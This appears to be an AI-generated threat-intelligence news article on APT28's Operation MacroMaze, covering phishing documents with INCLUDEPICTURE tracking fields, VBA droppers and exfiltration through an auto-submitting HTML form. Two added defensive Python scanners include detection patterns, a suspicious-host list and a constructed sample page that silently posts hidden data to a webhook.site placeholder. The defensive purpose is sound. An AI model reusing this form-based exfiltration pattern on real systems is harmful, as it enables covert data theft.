

Ethical Hacking News

Operation MacroMaze: APT28's Webhook-Based Covert Data Exfiltration Campaign



APT28 has launched a new webhook-based covert data exfiltration campaign called Operation MacroMaze, using spear-phishing emails and macro malware to steal sensitive information from European targets. The attackers used standard HTML features to send stolen data while leaving minimal traces on disk, maximizing stealth. This campaign is another example of the group's ongoing efforts to evade detection and continue targeting sensitive information across Europe.

  • Operation MacroMaze is a web-based covert data exfiltration campaign attributed to Russia-linked APT28 (UAC-0001, Fancy Bear, etc.) launched in September 2025.
  • The campaign used spear-phishing emails with "INCLUDEPICTURE" fields pointing to webhooks to evade detection and exfiltrate sensitive data.
  • Webhook-based attack chain utilized heavy string concatenation to hide malicious commands.
  • Variant macros dropped malware and deployed additional payloads on compromised systems between September 2025 and January 2026.
  • The attackers employed a browser-based exfiltration method, sending stolen data without user interaction.
  • The campaign is part of APT28's ongoing efforts to evade detection and target sensitive information across Europe.



    Operation MacroMaze is a recent web-based covert data exfiltration campaign attributed to Russia-linked APT28, also known as UAC-0001, Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM. The campaign was launched in September 2025 and continued until January 2026, targeting select entities in Western and Central Europe. This article delves into the specifics of Operation MacroMaze, a complex attack chain that utilized webhooks to evade detection and exfiltrate sensitive data.

    The campaign began with spear-phishing emails that delivered weaponized documents containing an "INCLUDEPICTURE" field pointing to a webhook[.]site URL hosting a JPG. This field functions as a tracking mechanism: when the document is opened and Word processes the INCLUDEPICTURE field, an outbound HTTP request is generated to the remote server, allowing the attackers to log metadata associated with the request. The documents also carried a VBA macro, in which the attackers used heavy string concatenation to hide key commands and make them harder for security software to detect.
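Because an INCLUDEPICTURE field makes Word issue an outbound request as soon as the document is processed, a defender wants to find such fields before the file reaches a mailbox. The scanner below is an added example written for this article, not code from the researchers or the publication: it unpacks a .docx, joins the `w:instrText` runs of each paragraph (Word often splits one field code over several runs) and classifies every INCLUDEPICTURE target as local, remote, or pointing at a host on a watch list seeded with the webhook[.]site domain the article names. The GUID-style path in the sample is a constructed placeholder, and `build_sample_docx` produces a deliberately minimal document containing only the part the scanner reads.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape
from urllib.parse import urlparse

# WordprocessingML namespace; field codes live in <w:instrText> runs.
W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"

# Matches:  INCLUDEPICTURE "target" \d   or   INCLUDEPICTURE target
INCLUDEPICTURE_RE = re.compile(r'INCLUDEPICTURE\s+(?:"([^"]*)"|(\S+))', re.I)

# Hosts to raise to 'alert'; seeded with the endpoint named in the article.
SUSPICIOUS_HOSTS = ("webhook.site",)


def extract_field_targets(docx_bytes):
    """Return (part_name, target) for every INCLUDEPICTURE field in word/*.xml.

    The instrText runs of each paragraph are joined before matching, because
    Word frequently splits one field code across several runs.
    """
    targets = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            root = ET.fromstring(z.read(name))
            for para in root.iter(W + "p"):
                instr = "".join(t.text or "" for t in para.iter(W + "instrText"))
                for m in INCLUDEPICTURE_RE.finditer(instr):
                    targets.append((name, m.group(1) or m.group(2)))
    return targets


def assess(docx_bytes):
    """Classify each field: 'info' for local paths, 'warn' for any remote URL
    (Word will issue an outbound request for it on open or field update),
    'alert' for a remote URL on a listed host."""
    findings = []
    for part, target in extract_field_targets(docx_bytes):
        u = urlparse(target)
        host = (u.hostname or "").lower()
        remote = u.scheme in ("http", "https") and bool(host)
        level = "info"
        if remote:
            level = "warn"
            if any(host == h or host.endswith("." + h) for h in SUSPICIOUS_HOSTS):
                level = "alert"
        findings.append({"part": part, "target": target, "remote": remote, "level": level})
    return findings


def build_sample_docx(field_code):
    """Construct a minimal .docx (a labelled sample, not a real lure) whose
    single paragraph carries one field code split across two instrText runs."""
    half = len(field_code) // 2
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        "<w:body><w:p>"
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        f'<w:r><w:instrText xml:space="preserve">{escape(field_code[:half])}</w:instrText></w:r>'
        f'<w:r><w:instrText xml:space="preserve">{escape(field_code[half:])}</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        "</w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        # Only the part the scanner reads; a real .docx carries more parts.
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample: placeholder GUID path, not an indicator from the article.
    lure = build_sample_docx(
        ' INCLUDEPICTURE "https://webhook.site/00000000-0000-0000-0000-000000000000/lure.jpg" \\d ')
    for finding in assess(lure):
        print(finding)
```

Run it against a mail-gateway quarantine or a folder of attachments by reading each file's bytes into `assess()`; anything at `warn` or above deserves a look even when the host is not on the list, since a first-seen tracking host is exactly what a new campaign would use.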

    Once a victim opened the document, the macro silently retrieved the image, acting like a tracking pixel that alerted the attackers that the document had been viewed. Between September 2025 and January 2026 the attackers used variants of this macro, modified to drop malware and deploy additional payloads on compromised systems. Researchers identified four closely related macro variants acting as droppers, each dropping six files (VBS, BAT, CMD, HTM, XHTML) into the %USERPROFILE% folder using GUID-like names tied to a webhook[.]site C2 path.

    The attackers used standard HTML features to send stolen data while leaving minimal traces on disk, relying on the browser rather than custom network code for exfiltration. The final HTML file was constructed by concatenating a static HTM file, the captured output of the reconstructed CMD payload, and a closing XHTML template. When rendered by Microsoft Edge, the form is submitted, causing the collected command output to be exfiltrated to the remote webhook endpoint without user interaction.
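The exfiltration step leaves an artefact on disk that can be recognised structurally: an HTML file whose form posts to an external host, whose fields are hidden or unrendered, and which is submitted from script rather than by a user. The auditor below is an added example for this article, not the researchers' tooling; it parses an HTML file with the standard library, gathers every form together with its visible submit controls, collects inline script and `on*` handler text, and flags the combination described in the article. Both sample pages are constructed here, the webhook path is a placeholder GUID, and `trusted_hosts` is an assumed allow-list parameter.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# A form.submit() call in a script block or an inline event handler.
SUBMIT_CALL_RE = re.compile(r"\.submit\s*\(")


class FormAudit(HTMLParser):
    """Collect each form (action, method, field counts, user-visible submit
    controls) plus all script text and on* handler values on the page."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.script_text = []
        self._in_script = False
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        for k, v in a.items():          # onload=, onpageshow=, ... count as script
            if k.startswith("on"):
                self.script_text.append(v)
        if tag == "form":
            self._cur = {"action": a.get("action", ""), "method": a.get("method", "get").lower(),
                         "fields": 0, "hidden_fields": 0, "submit_controls": 0}
            self.forms.append(self._cur)
        elif self._cur is not None and tag in ("input", "textarea", "select"):
            self._cur["fields"] += 1
            typ = a.get("type", "").lower()
            style = a.get("style", "").replace(" ", "").lower()
            if typ == "hidden" or "display:none" in style:
                self._cur["hidden_fields"] += 1
            if typ in ("submit", "image"):
                self._cur["submit_controls"] += 1
        elif self._cur is not None and tag == "button":
            if a.get("type", "submit").lower() == "submit":
                self._cur["submit_controls"] += 1
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


def audit_html(text, trusted_hosts=()):
    """Return one finding per form. A form is flagged when it targets an
    external host, the page submits a form from script, and the form offers
    no user path (no submit control, or every field hidden/unrendered)."""
    p = FormAudit()
    p.feed(text)
    p.close()
    scripted_submit = any(SUBMIT_CALL_RE.search(s) for s in p.script_text)
    findings = []
    for f in p.forms:
        u = urlparse(f["action"])
        host = (u.hostname or "").lower()
        external = u.scheme in ("http", "https") and host not in trusted_hosts
        no_user_path = f["submit_controls"] == 0 or (
            f["fields"] > 0 and f["hidden_fields"] == f["fields"])
        findings.append({**f, "host": host, "external": external,
                         "scripted_submit": scripted_submit,
                         "flagged": external and scripted_submit and no_user_path})
    return findings


# Constructed samples (placeholder GUID path; not indicators from the article).
SAMPLE_EXFIL_PAGE = """<html><body onload="document.forms[0].submit()">
<form method="post" action="https://webhook.site/00000000-0000-0000-0000-000000000000">
<textarea name="o" style="display:none">CONSTRUCTED sample command output</textarea>
</form></body></html>"""

SAMPLE_LOGIN_PAGE = """<html><body><form method="post" action="/login">
<input type="text" name="user"><input type="password" name="pw">
<button type="submit">Sign in</button></form></body></html>"""

if __name__ == "__main__":
    for name, page in (("exfil", SAMPLE_EXFIL_PAGE), ("login", SAMPLE_LOGIN_PAGE)):
        for finding in audit_html(page):
            print(name, finding["host"] or finding["action"], "flagged" if finding["flagged"] else "ok")
```

Point it at `.htm`/`.xhtml` files found in user profile directories during triage, or at files written by `cmd.exe` or `wscript.exe` in EDR telemetry; the same host check also works as a proxy rule, since the submitted request carries the form target as its destination.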

    This campaign proves that simplicity can be powerful. The attacker uses basic tools (batch files, tiny VBS launchers and simple HTML) but arranges them with care to maximize stealth. Although specific command files used to gather system data were not recovered, similar operations attributed to APT28 by CERT Polska and the Computer Emergency Response Team of Ukraine suggest that this stage likely deployed a lightweight reconnaissance script, collecting basic host details such as IP address, directory listings, and system environment information before exfiltration.

    The APT28 group has been active since at least 2007, targeting governments, militaries, and security organizations worldwide. The group was involved in the string of attacks that targeted the 2016 Presidential election. In January 2026, Zscaler ThreatLabz uncovered another campaign targeting Central and Eastern Europe, called Operation Neusploit, which used weaponized RTF files and localized lures to deploy MiniDoor, PixyNetLoader, and Covenant Grunt implants.

    The APT28 group operates out of military unit 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS). The group's involvement in Operation MacroMaze highlights its ongoing efforts to evade detection and continue targeting sensitive information across Europe. This campaign serves as a reminder of the importance of vigilance in protecting against such covert data exfiltration tactics.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/Operation-MacroMaze-APT28s-Webhook-Based-Covert-Data-Exfiltration-Campaign-ehn.shtml

  • Published: Tue Feb 24 04:04:37 2026 by llama3.2 3B Q4_K_M
